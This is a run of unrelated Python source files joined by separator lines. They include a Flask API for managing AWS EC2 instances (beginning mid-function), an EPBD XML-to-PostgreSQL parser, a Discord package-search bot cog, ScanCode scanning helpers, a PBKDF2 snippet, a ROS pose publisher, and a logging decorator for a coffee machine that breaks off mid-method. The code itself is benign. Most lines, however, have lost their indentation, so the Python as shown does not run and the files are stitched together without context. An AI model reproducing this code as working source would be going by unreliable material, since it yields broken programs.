try:
client = get_aws_client(request)
instances = client.describe_instances()
output = []
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
output.append(
{
'id': instance['InstanceId'],
"instance-type": instance['InstanceType'],
"instance-state": instance['State']['Name'],
"private-ip": instance['PrivateIpAddress'],
"key-name": instance['KeyName'],
"image-id": instance['ImageId'],
"vpc-id": instance['VpcId'],
"subnet-id": instance['SubnetId'],
"security-group-ids": instance['SecurityGroups'],
}
)
print(output)
return jsonify(output), 200
except Exception as error:
print(str(error))
        return jsonify({'Message': "Unexpected error occurred", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/start
@app.route("/ec2/start", methods=["POST"])
def start_ec2_instances():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.start_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["StartingInstances"][0]), 200
except Exception as error:
print(str(error))
        return jsonify({'Message': "Unexpected error occurred", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/stop
@app.route("/ec2/stop", methods=["POST"])
def stop_ec2_instances():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.stop_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["StoppingInstances"][0]), 200
except Exception as error:
print(str(error))
        return jsonify({'Message': "Unexpected error occurred", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/create
@app.route("/ec2/create", methods=["POST"])
def create_ec2_instance():
try:
client = get_aws_client(request)
KeyName = request.args.get("KeyName")
SecurityGroupIds = request.args.get("SecurityGroupId")
response = client.run_instances(
ImageId='ami-0fb653ca2d3203ac1', # Ubuntu Server 20.04, 64-bit x86
InstanceType='t2.micro', # 1 vCPU, 1 GB RAM (Free tier ^^)
MinCount=1,
MaxCount=1,
KeyName=KeyName,
SecurityGroupIds=[SecurityGroupIds]
)
print(response)
return jsonify(response["Instances"][0]), 200
except Exception as error:
print(str(error))
        return jsonify({'Message': "Unexpected error occurred", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/terminate
@app.route("/ec2/terminate", methods=["POST"])
def terminate_ec2_instance():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.terminate_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["TerminatingInstances"][0]), 200
except Exception as error:
print(str(error))
        return jsonify({'Message': "Unexpected error occurred", 'Error': str(error)}), 500
if __name__ == "__main__":
app.run(host=config["host"],
port=config["port"],
debug=False)
|
# -*- coding: utf-8 -*-
"""
Parses EPBD XML data and puts it in a PostgreSQL database.
Based on epbdparser.py made by RVO.
@author: Chris Lucas
"""
import argparse
import xml.sax
import psycopg2
from psycopg2.extensions import AsIs
class EqualError(Exception):
def __init__(self, msg):
self.msg = msg
class HigherError(Exception):
def __init__(self, msg):
self.msg = msg
class LowerError(Exception):
def __init__(self, msg):
self.msg = msg
# -----------------------------------------------------------------------------
# EpbdErrorHandler
# -----------------------------------------------------------------------------
class EpbdErrorHandler(xml.sax.ErrorHandler):
def error(self, exception):
print(exception)
def fatalError(self, exception):
print(exception)
# -----------------------------------------------------------------------------
# EpbdContentHandler
# -----------------------------------------------------------------------------
class EpbdContentHandler(xml.sax.ContentHandler):
def __init__(self, host, dbname, schema_name, table_name,
username, password='', port=5432, force_update=False):
self.Kolommen = {"Pand_postcode": "char(6)",
"Pand_huisnummer": "int",
"Pand_huisnummer_toev": "varchar(7)",
"Pand_bagverblijfsobjectid": "varchar(17)",
"Pand_opnamedatum": "date",
"Pand_berekingstype": "varchar(76)",
"Pand_energieprestatieindex": "real",
"Pand_energieklasse": "varchar(6)",
"Pand_registratiedatum": "date",
"Pand_energielabel_is_prive": "boolean",
"Meting_geldig_tot": "date",
"Pand_gebouwklasse": "char(1)",
"Pand_gebouwtype": "varchar(44)",
"Pand_gebouwsubtype": "varchar(19)",
"Pand_SBIcode": "int"}
self.host = host
self.dbname = dbname
self.user = username
self.password = password
self.port = port
self.schema_name = schema_name
self.table_name = table_name
self.force_update = force_update
# -------------------------------------------------------------------------
    # called at the start of the document
# -------------------------------------------------------------------------
def startDocument(self):
        # Connect to the database
conn_str = "host='{}' dbname='{}' user='{}' password='{}' port='{}'".format(self.host,
self.dbname,
self.user,
self.password,
self.port)
self.conn = psycopg2.connect(conn_str)
self.cursor = self.conn.cursor()
        # when this flag is set to true, data will be written out
self.isdata = False
self.isstuurcode = False
self.isvolgnummer = False
        self.checked_volgnummer = self.force_update is True
        # this value is used to determine which element is currently being
        # processed; it is set on start-element events and cleared on
        # end-element events
self.current = ""
        # use a dictionary object as a buffer, since some tags
        # do not always occur
self.data = {}
for name in self.Kolommen:
self.data[name] = ""
query = "SELECT * FROM\
{}.laatste_volgnummer;".format(AsIs(self.schema_name))
self.cursor.execute(query)
self.db_volgnummer = self.cursor.fetchone()[0]
# -------------------------------------------------------------------------
    # called at the start of a new tag
# -------------------------------------------------------------------------
def startElement(self, name, attrs):
if (name == "Mutatiebericht"):
pass
elif (name == "Mutatievolgnummer"):
self.isvolgnummer = True
elif (name == "Stuurcode"):
self.isstuurcode = True
elif (name in self.Kolommen):
            # only for these tags do we actually record the data (buffered for the database insert)
self.isdata = True
self.current = name
elif (name == "Pandcertificaat"):
            # start of a new record ("row")
            # reinitialize the buffer
self.buffer = ""
# -------------------------------------------------------------------------
    # called after reading the content of a tag
# -------------------------------------------------------------------------
def characters(self, content):
        # write the value into the buffer when allowed
if (self.isdata):
self.data[self.current] += content.strip()
elif (self.isstuurcode):
code = content.strip()
if code != "":
self.stuurcode = int(code)
elif (self.isvolgnummer):
nummer = content.strip()
if nummer != "":
self.volgnummer = int(nummer)
# -------------------------------------------------------------------------
    # called at the end of a tag
# -------------------------------------------------------------------------
def endElement(self, name):
if (name == "Mutatievolgnummer"):
if not (self.checked_volgnummer):
                if self.volgnummer == self.db_volgnummer:
                    raise EqualError(
                        'Mutatievolgnummer is equal to the last sequence number in the database.')
                elif self.volgnummer < self.db_volgnummer:
                    raise LowerError(
                        "Mutatievolgnummer is lower than the last sequence number in the database.")
                elif self.volgnummer > (self.db_volgnummer + 1):
                    print(self.db_volgnummer)
                    print(self.volgnummer)
                    raise HigherError(
                        "Mutatievolgnummer is more than 1 higher than the last sequence number in the database.")
self.checked_volgnummer = True
elif (name == "Pandcertificaat"):
            # Build a query to insert the data into the database
if int(self.stuurcode) == 1:
columns = "("
parameters = "("
values = []
for key, value in self.data.items():
if value != "":
columns += key + ", "
parameters += "%s" + ", "
values.append(value)
columns = columns[:-2] + ")"
parameters = parameters[:-2] + ")"
query = "INSERT INTO {}.{}\
{} VALUES {};".format(AsIs(self.schema_name),
AsIs(self.table_name),
columns,
parameters)
self.cursor.execute(query, values)
elif int(self.stuurcode) == 2:
values = [self.data["Pand_bagverblijfsobjectid"],
self.data["Pand_postcode"],
self.data["Pand_huisnummer"]]
query = "DELETE FROM {}.{} WHERE\
Pand_bagverblijfsobjectid = %s\
AND Pand_postcode = %s\
AND Pand_huisnummer = %s;".format(AsIs(self.schema_name),
AsIs(self.table_name))
self.cursor.execute(query, values)
            # reinitialize the buffer by clearing all of its values
for name in self.data.keys():
self.data[name] = ""
        # always clear the current value after closing a tag
self.current = ""
        # always unset the data-writing flag after
        # closing a tag
self.isdata = False
self.isstuurcode = False
self.isvolgnummer = False
# -------------------------------------------------------------------------
    # called at the end of the document
# -------------------------------------------------------------------------
def endDocument(self):
        # use the end of the document to close the connection
        # to the database
query = "UPDATE {}.laatste_volgnummer\
SET volgnummer = %s;".format(AsIs(self.schema_name))
self.cursor.execute(query, [self.volgnummer])
self.cursor.close()
self.conn.commit()
self.conn.close()
def argument_parser():
"""
Define and return the arguments.
"""
description = (
"Reads an EPBD XML data file and writes it to a postgresql database.")
parser = argparse.ArgumentParser(description=description)
parser.add_argument('input_path', metavar='XMLFilePath',
help='The path to the EPBD XML file.')
required_named = parser.add_argument_group('required named arguments')
required_named.add_argument('-o', '--host',
                                help='The host address of the PostgreSQL database.',
required=True)
required_named.add_argument('-d', '--dbname',
help='The name of the database to write to.',
required=True)
required_named.add_argument('-s', '--schema',
help='The name of the schema to write to.',
required=True)
required_named.add_argument('-t', '--table',
help='The name of the table to write to.',
required=True)
required_named.add_argument('-u', '--user',
help='The username to access the PostgreSQL database.',
required=True)
parser.add_argument('-p', '--password',
help='The password to access the PostgreSQL database.',
required=False,
default='')
parser.add_argument('-r', '--port',
help='The port of the PostgreSQL database.',
type=int,
required=False,
default=5432)
parser.add_argument('-f', '--force',
help='Force the update without checking the mutation number. WARNING: Could lead to an invalid dataset.',
action='store_true')
args = parser.parse_args()
return args
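# Example invocation (a sketch; the script, host, and file names below are
# hypothetical):
# python epbdparser.py -o localhost -d epbd -s public -t pandcertificaat \
#     -u postgres -p secret mutations.xml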
# -----------------------------------------------------------------------------
# program entry point
# -----------------------------------------------------------------------------
def main():
args = argument_parser()
    # create the parser object
parser = xml.sax.make_parser()
    # add objects for tag processing and error handling
parser.setContentHandler(EpbdContentHandler(args.host, args.dbname, args.schema,
args.table, args.user, args.password,
args.port, args.force))
parser.setErrorHandler(EpbdErrorHandler())
    # parse the source file
    with open(args.input_path, "rb") as f:
src = xml.sax.xmlreader.InputSource()
src.setByteStream(f)
src.setEncoding("UTF-8")
parser.parse(src)
if __name__ == '__main__':
main()
|
from ._response import Response
class Me(Response):
@property
def account_status(self) -> str:
return self['accountStatus']
@property
def account_type(self) -> str:
return self['accountType']
@property
def pin_status(self) -> str:
return self['pinStatus']
@property
def username(self) -> str:
return self['profile']['nickname'] or ''
@property
def user_id(self) -> str:
return self['profile']['userId']
@property
def us_market_data_subscription_activated(self) -> bool:
return self['usMarketDataSubscriptionActivated']
|
import discord
from discord.commands.commands import Option, slash_command
from discord.commands.context import AutocompleteContext
from discord.ext import commands
import json
import re
import traceback
import urllib.parse
import aiohttp
from datetime import datetime
from yarl import URL
from data.services.guild_service import guild_service
from aiocache import cached
from utils.config import cfg
from utils.logger import logger
from utils.context import BlooContext, BlooOldContext
from utils.menu import TweakMenu
from utils.permissions.checks import PermissionsFailure, whisper_in_general
from utils.permissions.permissions import permissions
package_url = 'https://api.parcility.co/db/package/'
search_url = 'https://api.parcility.co/db/search?q='
default_repos = [
"apt.bingner.com",
"apt.procurs.us",
"apt.saurik.com",
"apt.oldcurs.us",
"repo.chimera.sh",
"diatr.us/apt",
"repo.theodyssey.dev",
]
@cached(ttl=300)
async def package_request(package):
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'{package_url}{package.get("Package")}', encoded=True)) as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 200:
package["Price"] = response['data'].get("Price")
else:
package["Price"] = "No price data"
return package
return package
async def search_request(search):
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'{search_url}{urllib.parse.quote(search)}', encoded=True)) as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
async def repo_autocomplete(ctx: AutocompleteContext):
repos = await fetch_repos()
repos = [repo["id"] for repo in repos if repo.get("id") and repo.get("id") is not None]
repos.sort()
return [repo for repo in repos if ctx.value.lower() in repo.lower()][:25]
@cached(ttl=3600)
async def fetch_repos():
async with aiohttp.ClientSession() as client:
async with client.get('https://api.parcility.co/db/repos/') as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
async def format_tweak_page(entries, all_pages, current_page, ctx):
entry = entries[0]
await package_request(entry)
# if not entry.get('repo').get('isDefault'):
# ctx.repo = entry.get('repo').get('url')
# else:
# ctx.repo = None
ctx.repo = entry.get('repo').get('url')
for repo in default_repos:
if repo in entry.get('repo').get('url'):
ctx.repo = None
break
embed = discord.Embed(title=entry.get('Name'), color=discord.Color.blue())
embed.description = discord.utils.escape_markdown(
entry.get('Description')) or "No description"
embed.add_field(name="Author", value=discord.utils.escape_markdown(
entry.get('Author') or "No author"), inline=True)
embed.add_field(name="Version", value=discord.utils.escape_markdown(
entry.get('Version') or "No version"), inline=True)
embed.add_field(name="Price", value=entry.get("Price") or (entry.get(
"Tag") and "cydia::commercial" in entry.get("Tag") and "Paid") or "Free")
embed.add_field(
name="Repo", value=f"[{entry.get('repo').get('label')}]({entry.get('repo').get('url')})" or "No repo", inline=True)
# if entry.get('repo').get('isDefault') is False:
# embed.add_field(
# name="Add Repo", value=f"[Click Here](https://sharerepo.stkc.win/?repo={entry.get('repo').get('url')})" or "No repo", inline=True)
try:
if entry.get('Depiction'):
embed.add_field(
name="More Info", value=f"[View Depiction]({entry.get('Depiction')})", inline=False)
else:
raise Exception("No depiction found!")
    except Exception:
embed.add_field(
name="More Info", value=f"[View on Parcility](https://parcility.co/package/{entry.get('Package')}/{entry.get('repo').get('slug')})", inline=False)
pattern = re.compile(
r"((http|https)\:\/\/)[a-zA-Z0-9\.\/\?\:@\-_=#]+\.([a-zA-Z]){2,6}([a-zA-Z0-9\.\&\/\?\:@\-_=#])*")
    if entry.get('Icon') and pattern.match(entry.get('Icon')):
embed.set_thumbnail(url=entry.get('Icon'))
embed.set_footer(icon_url=entry.get('repo').get('icon'), text=discord.utils.escape_markdown(
entry.get('Package'))+f" • Page {current_page}/{len(all_pages)}" or "No package")
embed.timestamp = datetime.now()
return embed
async def format_repo_page(entries, all_pages, current_page, ctx):
repo_data = entries[0]
# if not repo_data.get('isDefault'):
# ctx.repo = repo_data.get('url')
# else:
# ctx.repo = None
ctx.repo = repo_data.get('url')
for repo in default_repos:
if repo in repo_data.get('url'):
ctx.repo = None
break
embed = discord.Embed(title=repo_data.get(
'Label'), color=discord.Color.blue())
embed.description = repo_data.get('Description')
embed.add_field(name="Packages", value=repo_data.get(
'package_count'), inline=True)
embed.add_field(name="Sections", value=repo_data.get(
'section_count'), inline=True)
embed.add_field(name="URL", value=repo_data.get('url'), inline=False)
# if repo_data.get('isDefault') is False:
# embed.add_field(
# name="Add Repo", value=f'[Click Here](https://sharerepo.stkc.win/?repo={repo_data.get("url")})', inline=True)
embed.add_field(
name="More Info", value=f'[View on Parcility](https://parcility.co/{repo_data.get("id")})', inline=False)
embed.set_thumbnail(url=repo_data.get('Icon'))
    footer_text = f"Page {current_page} of {len(all_pages)}"
    if repo_data.get('isDefault') is True:
        footer_text = f"Default Repo • {footer_text}"
    embed.set_footer(text=footer_text)
return embed
class Parcility(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.repo_url = 'https://api.parcility.co/db/repo/'
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.guild is None:
return
if not message.guild.id == cfg.guild_id:
return
author = message.author
if author is None:
return
if author.bot:
return
if not permissions.has(message.guild, author, 5) and message.channel.id == guild_service.get_guild().channel_general:
return
pattern = re.compile(
r".*?(?<!\[)+\[\[((?!\s+)([\w+\ \&\+\-\<\>\#\:\;\%]){2,})\]\](?!\])+.*")
if not pattern.match(message.content):
return
matches = pattern.findall(message.content)
if not matches:
return
search_term = matches[0][0].replace('[[', '').replace(']]', '')
if not search_term:
return
ctx = await self.bot.get_context(message, cls=BlooOldContext)
async with ctx.typing():
response = await search_request(search_term)
if response is None:
await ctx.send_error("An error occurred while searching for that tweak.")
return
elif len(response) == 0:
await ctx.send_error("Sorry, I couldn't find any tweaks with that name.")
return
menu = TweakMenu(pages=response, channel=ctx.channel,
format_page=format_tweak_page, interaction=False, ctx=ctx, no_skip=True)
await menu.start()
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Search for a package")
async def package(self, ctx: BlooContext, *, search_term: Option(str, description="Name of the package to search for")):
async with ctx.typing():
response = await search_request(search_term)
if response is None:
raise commands.BadArgument("An error occurred while searching for that tweak.")
elif len(response) == 0:
raise commands.BadArgument("Sorry, I couldn't find any tweaks with that name.")
menu = TweakMenu(pages=response, channel=ctx.channel,
format_page=format_tweak_page, interaction=True, ctx=ctx, whisper=ctx.whisper, no_skip=True)
await menu.start()
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Search for a repo")
async def repo(self, ctx: BlooContext, *, repo: Option(str, description="Name of the repo to search for", autocomplete=repo_autocomplete)):
async with ctx.typing():
data = await self.repo_request(repo)
if data is None:
raise commands.BadArgument(
'An error occurred while searching for that repo')
if not isinstance(data, list):
data = [data]
if len(data) == 0:
raise commands.BadArgument(
"Sorry, I couldn't find a repo by that name.")
menu = TweakMenu(data, ctx.channel, format_repo_page,
interaction=True, ctx=ctx, whisper=ctx.whisper)
await menu.start()
@cached(ttl=1800)
async def repo_request(self, repo):
async with aiohttp.ClientSession() as client:
async with client.get(f'{self.repo_url}{repo}') as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
@package.error
@repo.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
        if isinstance(error, (commands.MissingRequiredArgument,
                              PermissionsFailure,
                              commands.BadArgument,
                              commands.BadUnionArgument,
                              commands.MissingPermissions,
                              commands.BotMissingPermissions,
                              commands.MaxConcurrencyReached,
                              commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@848159481255034891> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Parcility(bot))
|
from sanic_testing.manager import TestManager
__version__ = "22.3.0"
__all__ = ("TestManager",)
|
#
# Copyright (c) 2018 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from itertools import islice
from os.path import getsize
import logging
import sys
from commoncode.filetype import get_last_modified_date
from commoncode.hash import multi_checksums
from typecode.contenttype import get_type
from scancode import ScancodeError
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
"""
Main scanning functions.
Each scanner is a function that accepts a location and returns a sequence of
mappings as results.
Note: this API is unstable and still evolving.
"""
def get_copyrights(location, deadline=sys.maxsize, **kwargs):
"""
    Return a mapping with 'copyrights', 'holders' and 'authors' keys, each with
    a value that is a list of mappings for copyright data detected in the file
    at `location`.
"""
from cluecode.copyrights import detect_copyrights
copyrights = []
holders = []
authors = []
for dtype, value, start, end in detect_copyrights(location, deadline=deadline):
if dtype == 'copyrights':
copyrights.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
elif dtype == 'holders':
holders.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
elif dtype == 'authors':
authors.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
results = OrderedDict([
('copyrights', copyrights),
('holders', holders),
('authors', authors),
])
return results
def get_emails(location, threshold=50, test_slow_mode=False, test_error_mode=False, **kwargs):
"""
Return a mapping with a single 'emails' key with a value that is a list of
mappings for emails detected in the file at `location`.
Return only up to `threshold` values. Return all values if `threshold` is 0.
    If `test_slow_mode` is True, the scan pauses for one second to simulate a
    slow scan; if `test_error_mode` is True, a ScancodeError is raised.
"""
if test_error_mode:
raise ScancodeError('Triggered email failure')
if test_slow_mode:
import time
time.sleep(1)
from cluecode.finder import find_emails
results = []
found_emails = ((em, ln) for (em, ln) in find_emails(location) if em)
if threshold:
found_emails = islice(found_emails, threshold)
for email, line_num in found_emails:
result = OrderedDict()
results.append(result)
result['email'] = email
result['start_line'] = line_num
result['end_line'] = line_num
return dict(emails=results)
def get_urls(location, threshold=50, **kwargs):
"""
Return a mapping with a single 'urls' key with a value that is a list of
mappings for urls detected in the file at `location`.
Return only up to `threshold` values. Return all values if `threshold` is 0.
"""
from cluecode.finder import find_urls
results = []
found_urls = ((u, ln) for (u, ln) in find_urls(location) if u)
if threshold:
found_urls = islice(found_urls, threshold)
    for url, line_num in found_urls:
        result = OrderedDict()
        results.append(result)
        result['url'] = url
result['start_line'] = line_num
result['end_line'] = line_num
return dict(urls=results)
DEJACODE_LICENSE_URL = 'https://enterprise.dejacode.com/urn/urn:dje:license:{}'
SPDX_LICENSE_URL = 'https://spdx.org/licenses/{}'
def get_licenses(location, min_score=0,
include_text=False, license_text_diagnostics=False,
license_url_template=DEJACODE_LICENSE_URL,
deadline=sys.maxsize, **kwargs):
"""
    Return a mapping of license detection data for licenses detected in the
    file at `location`.
    This mapping contains two keys:
     - 'licenses' with a value that is a list of mappings of license information.
     - 'license_expressions' with a value that is a list of license expression
       strings.
    `min_score` is a minimum score threshold from 0 to 100. The default of 0
    means that all license matches are returned. Otherwise, matches with a
    score below `min_score` are not returned.
    If `include_text` is True, matched text is included in the returned
    `licenses` data.
"""
from licensedcode import cache
idx = cache.get_index()
detected_licenses = []
detected_expressions = []
matches = idx.match(
location=location, min_score=min_score, deadline=deadline, **kwargs)
for match in matches:
matched_text = None
if include_text:
if license_text_diagnostics:
matched_text = match.matched_text(whole_lines=False, highlight=True)
else:
matched_text = match.matched_text(whole_lines=True, highlight=False)
detected_expressions.append(match.rule.license_expression)
detected_licenses.extend(
_licenses_data_from_match(match, matched_text, license_url_template)
)
return OrderedDict([
('licenses', detected_licenses),
('license_expressions', detected_expressions),
])
def _licenses_data_from_match(match, matched_text=None,
license_url_template=DEJACODE_LICENSE_URL):
"""
Return a list of "licenses" scan data built from a license match.
Used directly only internally for testing.
"""
from licensedcode import cache
licenses = cache.get_licenses_db()
detected_licenses = []
for license_key in match.rule.license_keys():
lic = licenses.get(license_key)
result = OrderedDict()
detected_licenses.append(result)
result['key'] = lic.key
result['score'] = match.score()
result['name'] = lic.name
result['short_name'] = lic.short_name
result['category'] = lic.category
result['is_exception'] = lic.is_exception
result['owner'] = lic.owner
result['homepage_url'] = lic.homepage_url
result['text_url'] = lic.text_urls[0] if lic.text_urls else ''
result['reference_url'] = license_url_template.format(lic.key)
spdx_key = lic.spdx_license_key
result['spdx_license_key'] = spdx_key
if spdx_key:
spdx_key = lic.spdx_license_key.rstrip('+')
spdx_url = SPDX_LICENSE_URL.format(spdx_key)
else:
spdx_url = ''
result['spdx_url'] = spdx_url
result['start_line'] = match.start_line
result['end_line'] = match.end_line
matched_rule = result['matched_rule'] = OrderedDict()
matched_rule['identifier'] = match.rule.identifier
matched_rule['license_expression'] = match.rule.license_expression
matched_rule['licenses'] = match.rule.license_keys()
matched_rule['is_license_text'] = match.rule.is_license_text
matched_rule['is_license_notice'] = match.rule.is_license_notice
matched_rule['is_license_reference'] = match.rule.is_license_reference
matched_rule['is_license_tag'] = match.rule.is_license_tag
matched_rule['matcher'] = match.matcher
matched_rule['rule_length'] = match.rule.length
matched_rule['matched_length'] = match.len()
matched_rule['match_coverage'] = match.coverage()
matched_rule['rule_relevance'] = match.rule.relevance
        # FIXME: for sanity, shouldn't matched_text always be included?
if matched_text:
result['matched_text'] = matched_text
return detected_licenses
def get_package_info(location, **kwargs):
"""
Return a mapping of package manifest information detected in the
file at `location`.
Note that all exceptions are caught if there are any errors while parsing a
package manifest.
"""
from packagedcode.recognize import recognize_packages
try:
recognized_packages = recognize_packages(location)
if recognized_packages:
return dict(packages=[package.to_dict() for package in recognized_packages])
except Exception as e:
if TRACE:
logger.error('get_package_info: {}: Exception: {}'.format(location, e))
pass
return dict(packages=[])
def get_file_info(location, **kwargs):
"""
Return a mapping of file information collected for the file at `location`.
"""
result = OrderedDict()
    # TODO: move date and size to the inventory collection step?
result['date'] = get_last_modified_date(location) or None
result['size'] = getsize(location) or 0
sha1, md5 = multi_checksums(location, ('sha1', 'md5',)).values()
result['sha1'] = sha1
result['md5'] = md5
collector = get_type(location)
result['mime_type'] = collector.mimetype_file or None
result['file_type'] = collector.filetype_file or None
result['programming_language'] = collector.programming_language or None
result['is_binary'] = bool(collector.is_binary)
result['is_text'] = bool(collector.is_text)
result['is_archive'] = bool(collector.is_archive)
result['is_media'] = bool(collector.is_media)
result['is_source'] = bool(collector.is_source)
result['is_script'] = bool(collector.is_script)
return result
def extract_archives(location, recurse=True):
"""
Yield ExtractEvent while extracting archive(s) and compressed files at
`location`. If `recurse` is True, extract nested archives-in-archives
recursively.
Archives and compressed files are extracted in a directory named
"<file_name>-extract" created in the same directory as the archive.
Note: this API is returning an iterable and NOT a sequence.
"""
from extractcode.extract import extract
from extractcode import default_kinds
for xevent in extract(location, kinds=default_kinds, recurse=recurse):
yield xevent
|
import hashlib
inp = input('Enter something: ')
salt = input('Enter salt: ')
# Derive a 32-byte key with PBKDF2-HMAC-SHA256 over 100,000 iterations.
dk = hashlib.pbkdf2_hmac('sha256', inp.encode('utf-8'), salt.encode('utf-8'), 100000)
# Print the derived key as hex rather than raw bytes.
print(dk.hex())
|
#! /home/znfs/pyenv_pyrobot_python2/bin/python
from robot_utils import *
# np and rospy are used below; import them explicitly rather than relying on
# the wildcard import above.
import numpy as np
import rospy
import tf
import yaml
from geometry_msgs.msg import Pose
param_file = '/home/znfs/project_ws/intera/src/iros2021/files/kinect_calibration.yaml'
def quaternion_to_trans_matrix(x, y, z, w, trans_x, trans_y, trans_z):
x_2, y_2, z_2 = x * x, y * y, z * z
xy, xz, yz, wx, wy, wz = x * y, x * z, y * z, w * x, w * y, w * z
# origin_rotation_matrix [1 - 2 * y_2 - 2 * z_2, 2 * xy + 2 * wz, 2 * xz - 2 * wy,
# 2 * xy - 2 * wz, 1 - 2 * x_2 - 2 * z_2, 2 * yz + 2 * wx,
# 2 * xz + 2 * wy, 2 * yz - 2 * wx, 1 - 2 * x_2 - 2 * y_2]
translation_matrix = np.array([1 - 2 * y_2 - 2 * z_2, 2 * xy - 2 * wz, 2 * xz + 2 * wy, trans_x,
2 * xy + 2 * wz, 1 - 2 * x_2 - 2 * z_2, 2 * yz - 2 * wx, trans_y,
2 * xz - 2 * wy, 2 * yz + 2 * wx, 1 - 2 * x_2 - 2 * y_2, trans_z,
0, 0, 0, 1
])
return translation_matrix.reshape((4, 4))
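# Sanity check (illustrative): the identity quaternion (x=y=z=0, w=1) leaves
# the rotation block as the identity, keeping only the translation:
#   quaternion_to_trans_matrix(0, 0, 0, 1, 0.1, 0.2, 0.3)
#   -> [[1, 0, 0, 0.1],
#       [0, 1, 0, 0.2],
#       [0, 0, 1, 0.3],
#       [0, 0, 0, 1.0]]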
def resolve_ext(yaml_data):
orientation = yaml_data['rot']
trans = yaml_data['trans']
trans_matrix = quaternion_to_trans_matrix(orientation[0], orientation[1], orientation[2], orientation[3],
trans[0], trans[1], trans[2])
return trans_matrix
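# The calibration YAML read by resolve_ext() is assumed to hold a quaternion
# and a translation, e.g. (illustrative values):
#   rot: [0.0, 0.0, 0.0, 1.0]   # quaternion x, y, z, w
#   trans: [0.5, 0.0, 0.3]      # translation in metres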
# lookup tf transform between two frames
def lookupTransform(tf_listener, target, source):
tf_listener.waitForTransform(target, source, rospy.Time(), rospy.Duration(4.0))
trans, rot = tf_listener.lookupTransform(target, source, rospy.Time())
euler = tf.transformations.euler_from_quaternion(rot)
source_target = tf.transformations.compose_matrix(translate=trans, angles=euler)
return trans, rot, source_target
def resolve(trans, rot):
pose = Pose()
pose.position.x = trans[0]
pose.position.y = trans[1]
pose.position.z = trans[2]
pose.orientation.x = rot[0]
pose.orientation.y = rot[1]
pose.orientation.z = rot[2]
pose.orientation.w = rot[3]
return pose
def main():
rospy.init_node('publish_static_tf')
pub = rospy.Publisher('/base2ee', Pose, queue_size=1)
    with open(param_file, 'r') as f:
        file_data = f.read()
tf_listener = tf.TransformListener()
tf_broadcaster = tf.TransformBroadcaster()
# loop rate
rate = rospy.Rate(100)
k_extrin = resolve_ext(yaml.safe_load(file_data))
rospy.loginfo("start to pub /base2ee tf topic")
    while not rospy.is_shutdown():
        trans, rot, source_target = lookupTransform(tf_listener, '/base', '/right_gripper_tip')
        base2eePose = resolve(trans, rot)
        pub.publish(base2eePose)
        # Throttle the loop to the configured 100 Hz publish rate.
        rate.sleep()
if __name__ == "__main__":
main()
|
import time
from random import randint
import getpass
def log(func):
def inner(*args, **kwargs):
start_time = time.perf_counter()
ret = func(*args, **kwargs)
elapsed_time = time.perf_counter() - start_time
ms_flag = False
if elapsed_time < 1:
elapsed_time *= 1000
ms_flag = True
func_name = func.__name__.split('_')
func_name = ' '.join(map(lambda x: x.capitalize(), func_name))
with open('machine.log', 'a') as f:
print('({})Running: {} [ exec-time = {:.3f} {} ]'.format(
getpass.getuser(),
func_name,
elapsed_time,
'ms' if ms_flag else 's'), file=f)
return ret
return inner
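# A line appended to machine.log by the decorator looks roughly like this
# (user name and timing will vary):
#   (alice)Running: Make Coffee [ exec-time = 2.071 s ]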
class CoffeeMachine():
water_level = 100
@log
def start_machine(self):
if self.water_level > 20:
return True
else:
print("Please add water!")
return False
@log
def boil_water(self):
return "boiling..."
@log
def make_coffee(self):
if self.start_machine():
